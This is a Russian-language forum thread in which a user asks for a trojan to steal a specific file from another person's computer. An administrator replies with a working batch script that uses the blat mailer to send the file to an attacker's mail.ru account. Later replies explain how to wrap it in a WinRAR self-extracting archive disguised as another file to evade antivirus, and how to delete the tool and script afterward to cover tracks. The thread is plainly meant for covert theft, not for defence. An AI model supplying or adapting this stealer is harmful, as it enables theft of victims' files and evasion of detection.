• Уменьшение отступа

    Обратная связь

    (info@ru-sfera.pw)

Кто знает троян для похищения файлов


MIXA066

Уважаемый пользователь
Форумчанин
Регистрация
18.05.2014
Сообщения
425
Репутация
127
Всем привет, недавно понадобилось стащить один файл с компьютера.
Я знаю точное месторасположение файла его название и расширение, но никак не могу найти нигде нормальный троян этот или аналогчиный, (скрин внизу) если есть у кого, поделитесь пожалуйста :D.

s45.radikal.ru_i110_1008_17_8713fb2d0b52.jpg
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 174
Предлагаю сделать самому при помощи батника, но понадобится специальная утилита blat !

Вот пример батника с прогой blat отправки файл через mail.ru:

Код:
@echo on
set eMail=my@mydomain.ru
set femail=myemail*********
set subj=-s "TEMA PISMA"
set server=-server smtp.mail.ru
set username=myemail
set password=mypassword
set debug=-debug -log blat.log -timestamp
set file=cube.log
 
blat bodytxt -to %eMail% -f %femail% -u %username% -pw %password% %subj% %server% -attacht %file%
pause


-------
eMail - кому
femail - от какого ящика на mail.ru отправляется
в body.txt можно поместить текст письма
cube.log - отправляемый файл
-attacht - означает отправка текстового файла
-attach - бинарного файла

Вместо cube.log вписать можно любой файл...

Склеить в экзешник можно при помощи самораспаковывающиеся архива, также можно замоскировать его под любой файл, рекомендую делать в винраре, т.к. его не палит АВ, удачи ! ;)
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 174
а как там указывать ну путь к файлу
Ну тут два варианта, первый если будешь маскировать в самораспаковывающийся архив, то достаточно распакавать в папку с нужным файлом и он его подцепит...

Второй вариант, вот так set =C:\cube.

Ну и не забывать про:
-attacht - означает отправка текстового файла
-attach - бинарного файла
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 174
Забыл сказать, не забывайте заметать следы, т.е. удаления всего этого дела после отправки, пример:
Код:
DEL /F /Q "Blat.exe" #Удалит blat.exe
Del /F /Q %0 #Удалит наш батник

Как-то так ! ;)
 

MIXA066

Уважаемый пользователь
Форумчанин
Регистрация
18.05.2014
Сообщения
425
Репутация
127
А надо что бы у пользователя утилита blat стояла? Ну на компьютере? Или это как компилятор делает автономные exe'шники
----
А вот нашел
rem *** Путь к программе blat.exe ***
set file_blat=D:\blat\blat.exe
Как я понял надо склеивать винраром батник с blat.exe и указывать месторасположение
---------
chdir c:\win32 вставил вначале батника (путь к распакованной утилите), либо распаковывать в одну директорию
ну и опечатка у тебя в коде
blat body.txt -to %eMail% -f %femail% -u %username% -pw %password% %subj% %server% -attacht %file%
если кто-то будет пользоваться там точки нет :D
 

MIXA066

Уважаемый пользователь
Форумчанин
Регистрация
18.05.2014
Сообщения
425
Репутация
127
Ну все вроде работает, но вот допустим если указываю путь C:\login все нормально качает
А если %AppData%/Roaming/login то не работает, подскажите что не так :D может из-за имени пользователя русского?
 
Верх Низ